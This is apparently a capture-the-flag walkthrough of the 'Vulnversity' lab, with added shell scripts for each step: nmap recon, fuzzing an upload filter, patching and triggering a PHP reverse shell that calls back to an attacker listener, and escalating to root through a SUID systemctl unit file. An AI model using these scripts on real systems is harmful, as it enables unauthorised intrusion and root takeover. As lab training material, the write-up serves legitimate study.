Vulnversity
Task 1 - Deploy the machine
🎯 Target IP: 10.10.39.96
Create a directory for the machine on the Desktop, with a subdirectory for the nmap scans.
Task 2 - Reconnaissance
I prefer to start recon by pinging the target; this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64. TTL is a hop count, not a time: each router on the path decrements it by one, so a reply of 63 or 64 points at a sender default of 64, which indicates a *nix system (probably Linux), while Windows systems usually start at 128. This is only a heuristic, since the default can be changed on either OS.
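As an added example (not part of the original write-up), the recon steps above as shell functions: pull the TTL out of ping output, map it to a likely OS family, and run the full nmap scan into the scans directory. The target default, the output directory and the ping sample are assumptions; the sample is constructed to show what a Linux host one hop away answers.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up. Assumptions: the target
# address, the scans directory and the ping sample below (constructed).
TARGET="${TARGET:-10.10.39.96}"
OUTDIR="${OUTDIR:-$HOME/Desktop/vulnversity/nmap}"

# Constructed ping output, as a Linux host one hop away would answer it.
PING_SAMPLE='PING 10.10.39.96 (10.10.39.96) 56(84) bytes of data.
64 bytes from 10.10.39.96: icmp_seq=1 ttl=63 time=24.3 ms
64 bytes from 10.10.39.96: icmp_seq=2 ttl=63 time=23.9 ms
64 bytes from 10.10.39.96: icmp_seq=3 ttl=63 time=24.0 ms'

# Read ping output on stdin and print the TTL of the first echo reply.
parse_ttl() {
  awk 'match($0, /ttl=[0-9]+/) { print substr($0, RSTART + 4, RLENGTH - 4); exit }'
}

# TTL is a hop count, not a time: every router on the path decrements it by
# one, so the value seen is the sender's default minus the hop distance.
# Common defaults: 64 (Linux, *BSD, macOS), 128 (Windows), 255 (Cisco IOS,
# Solaris). A heuristic only: the default can be changed in sysctl/registry.
ttl_to_os() {
  ttl="$1"
  if [ "$ttl" -le 64 ]; then
    echo "Linux/Unix (default TTL 64, $((64 - $ttl)) hop(s) away)"
  elif [ "$ttl" -le 128 ]; then
    echo "Windows (default TTL 128, $((128 - $ttl)) hop(s) away)"
  else
    echo "Network device/Solaris (default TTL 255, $((255 - $ttl)) hop(s) away)"
  fi
}

# The scan itself: all 65535 TCP ports, version probes (these answer the
# squid version question) and default scripts, saved in all three nmap
# formats (-oA) so the results can be re-read without rescanning.
scan_target() {
  mkdir -p "$OUTDIR"
  nmap -sV -sC -p- -T4 -v -oA "$OUTDIR/full" "$TARGET"
}

# Run the live recon only when asked, so the file can also be sourced.
if [ "${RUN_RECON:-0}" = "1" ]; then
  mkdir -p "$OUTDIR"
  t=$(ping -c 3 "$TARGET" | tee "$OUTDIR/ping.txt" | parse_ttl)
  ttl_to_os "$t"
  scan_target
fi
```

Run with `RUN_RECON=1 ./recon.sh` against the live box; without the variable the functions are only defined, which is what the checks below use.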
2.1 - Scan the box; how many ports are open?
6 ports are open
2.2 - What version of the squid proxy is running on the machine?
Looking at the service scan, squid-http is reported on TCP port 3128.
The squid proxy version is 3.5.12.
2.3 - How many ports will Nmap scan if the flag -p-400 was used?
400 ports (-p-400 means the range 1-400)
2.4 - What is the most likely operating system this machine is running?
Ubuntu
2.5 - What port is the web server running on?
Port 3333
2.6 - What is the flag for enabling verbose mode using Nmap?
-v
Task 3 - Locating directories using Gobuster
Using a fast directory discovery tool called Gobuster, you will locate a directory to which you can upload a shell. Point it at the web server found on port 3333, not the default port 80.
Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains, and virtual host names.
3.1 - What is the directory that has an upload form page?
/internal/
Task 4 - Compromise the Webserver
Now that you have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.
4.1 - What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
.php
We will fuzz the upload form to identify which extensions are not blocked.
To do this, we're going to use BurpSuite.
We're going to use Intruder (used for automating customised attacks).
To begin, make a wordlist with the following extensions (these become the Intruder payloads, with the extension of the uploaded filename as the single payload position):
.php
.php3
.php4
.php5
.phtml
Compare the Intruder responses: the blocked extensions all get the same error page, so the one whose response length differs is the extension the filter lets through. Now that we know what extension we can use for our payload, we can progress.
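As an added example, not the write-up's own steps, the same fuzz reproduced with curl instead of Burp, plus the "sort by length" check Intruder does by eye, and the two edits to the reverse shell before upload. The upload URL, the form field name `file`, the uploads directory, the attacker address and both samples are assumptions; the fuzz sample is constructed to show one extension getting a different response.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up. Reproduces the Intruder
# extension fuzz with curl, picks the odd response out, patches the reverse
# shell's callback address and triggers it. Assumptions: the upload URL, the
# form field name "file", the upload directory, and the constructed samples.
TARGET="${TARGET:-10.10.39.96}"
UPLOAD_URL="${UPLOAD_URL:-http://$TARGET:3333/internal/index.php}"
UPLOAD_DIR="${UPLOAD_DIR:-http://$TARGET:3333/internal/uploads}"
LHOST="${LHOST:-10.8.0.1}"     # attacker VPN address (assumed)
LPORT="${LPORT:-4444}"
EXTENSIONS="php php3 php4 php5 phtml"

# Upload a harmless probe under each extension; emit "ext status bytes".
fuzz_upload() {
  for ext in $EXTENSIONS; do
    printf '<?php echo "probe"; ?>' > "/tmp/probe.$ext"
    curl -s -o /dev/null -w "$ext %{http_code} %{size_download}\n" \
      -F "file=@/tmp/probe.$ext" "$UPLOAD_URL"
  done
}

# Constructed fuzz result: the rejected extensions get the same error page,
# so the accepted one is the line whose size differs.
FUZZ_SAMPLE='php 200 1412
php3 200 1412
php4 200 1412
php5 200 1412
phtml 200 1397'

# Read "ext status bytes" lines on stdin; print extensions whose response
# size is not the most common one.
find_outliers() {
  awk '{ ext[NR] = $1; size[NR] = $3; count[$3]++ }
       END {
         bestc = 0
         for (s in count) if (count[s] > bestc) { best = s; bestc = count[s] }
         for (i = 1; i <= NR; i++) if (size[i] != best) print ext[i]
       }'
}

# Constructed stand-in for the two lines of a PHP reverse shell that must be
# edited before upload ($ip/$port variables as in the common pentestmonkey
# shell; check your copy for its actual variable names).
SHELL_TEMPLATE=$(cat <<'EOF'
<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
)

# Rewrite the $ip/$port lines so the shell calls back to LHOST:LPORT.
patch_shell() {
  awk -v ip="$LHOST" -v port="$LPORT" -v q="'" '
    /^\$ip = /   { print "$ip = " q ip q ";"; next }
    /^\$port = / { print "$port = " port ";"; next }
    { print }'
}

# Start the listener in another terminal first:  nc -lvnp "$LPORT"
# Then upload the patched shell under the accepted extension and request it;
# the web server executes it and it connects back to the listener.
trigger_shell() {
  ext="$1"; src="${2:-php-reverse-shell.php}"
  patch_shell < "$src" > "/tmp/shell.$ext"
  curl -s -F "file=@/tmp/shell.$ext" "$UPLOAD_URL" > /dev/null
  # backgrounded: the HTTP request stays open for as long as the shell lives
  curl -s "$UPLOAD_DIR/shell.$ext" > /dev/null &
}

if [ "${RUN_FUZZ:-0}" = "1" ]; then
  fuzz_upload | tee /tmp/fuzz.txt
  echo "accepted: $(find_outliers < /tmp/fuzz.txt)"
fi
```

If the form field is not called `file`, the upload silently fails and every line will have the same size; read the form's HTML source first. `find_outliers` compares sizes only, so also eyeball the status codes in the saved fuzz output.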
We are going to use a PHP reverse shell as our payload. A reverse shell runs on the remote host and makes that host open a connection back to you: you listen for incoming connections, upload and execute the shell, and it calls back to give you control.
Download the reverse PHP shell linked in the room and edit its IP and port to point at your attacking machine and listening port before uploading it.
4.2 - What is the name of the user who manages the webserver?
bill
4.3 - What is the user flag?
Task 5 - Privilege Escalation
Now that you have compromised this machine, we will escalate our privileges and become the superuser (root).
In Linux, SUID (set user ID upon execution) is a special type of file permission given to a file. SUID lets a user run the program with the privileges of the file's owner rather than their own, for the duration of that execution.
For example, the binary to change your password has the SUID bit set on it (/usr/bin/passwd). This is because changing your password requires writing to /etc/shadow, which ordinary users cannot access but root can, so passwd runs with root privileges to make the change.
5.1 - On the system, search for all SUID files. Which file stands out?
We can use the following command to list SUID files:
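As an added example rather than the write-up's own command, a find-based SUID search plus a filter that drops the setuid utilities a stock install ships with, so what is left is the list worth reading. The KNOWN_SUID list is an assumption (a starting point, not an authority), and the test directory is constructed.

```shell
#!/usr/bin/env bash
# Added example, not the write-up's own command. KNOWN_SUID is an assumed
# list of setuid utilities that are normal on a stock install.
KNOWN_SUID="passwd sudo su mount umount chsh chfn gpasswd newgrp ping fusermount pkexec"

# Print every regular file with the setuid bit under $1 (default /),
# staying on one filesystem and silencing permission-denied noise.
find_suid() {
  find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Read SUID paths on stdin; print those whose basename is not in KNOWN_SUID.
# A SUID systemctl, for instance, is not in the list and would be printed.
unusual_suid() {
  while IFS= read -r path; do
    name=$(basename "$path"); hit=0
    for k in $KNOWN_SUID; do [ "$k" = "$name" ] && hit=1; done
    [ "$hit" -eq 0 ] && printf '%s\n' "$path"
  done
  return 0
}

# Only run against the live filesystem when asked.
if [ "${RUN_SUID:-0}" = "1" ]; then
  echo "== all SUID files =="; find_suid /
  echo "== not in the known list =="; find_suid / | unusual_suid
fi
```

`-perm -4000` matches the setuid bit regardless of the other mode bits; add `-perm -2000` in a second run if you also want SGID binaries. The filter is only a reading aid: a known name in an unexpected directory still deserves a look.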
/bin/systemctl stands out: it is not normally SUID, and as the tool that controls and monitors services it can start arbitrary units as root!
5.2 - Become root and get the last flag (/root/root.txt)
We can use the SUID entry for systemctl on GTFOBins to become root: https://gtfobins.github.io/gtfobins/systemctl/
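As an added example (the GTFOBins technique written out, not the write-up's own commands), a unit file whose ExecStart runs our command, linked and started through the SUID systemctl so systemd executes it as root. The path to the SUID binary and the output file are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: the GTFOBins SUID systemctl
# technique. Assumptions: the SUID binary lives at /bin/systemctl and
# /tmp/root.txt is writable for the result.
SYSTEMCTL="${SYSTEMCTL:-/bin/systemctl}"

# Print a oneshot unit that runs $1 through /bin/sh. systemd runs the unit as
# root, so whatever $1 does happens with root privileges. The command must
# not contain double quotes, which would end the ExecStart string early.
make_unit() {
  printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "%s"\n[Install]\nWantedBy=multi-user.target\n' "$1"
}

# Write the unit to an absolute path (link refuses relative ones), register
# it and start it. The SUID bit is what lets an unprivileged user make the
# privileged link/enable calls.
root_via_systemctl() {
  cmd="${1:-cat /root/root.txt > /tmp/root.txt}"
  TF=$(mktemp).service
  make_unit "$cmd" > "$TF"
  "$SYSTEMCTL" link "$TF"
  "$SYSTEMCTL" enable --now "$TF"   # starts the unit immediately
  cat /tmp/root.txt
}

# Only fire on the target when asked.
if [ "${RUN_EXPLOIT:-0}" = "1" ]; then
  root_via_systemctl
fi
```

Check the SUID bit on the exact binary you call (`ls -l /bin/systemctl`); running `systemctl` by bare name could pick up a non-SUID copy from PATH. For a persistent shell instead of a one-off read, use a command such as `chmod u+s /bin/bash` and then `bash -p`.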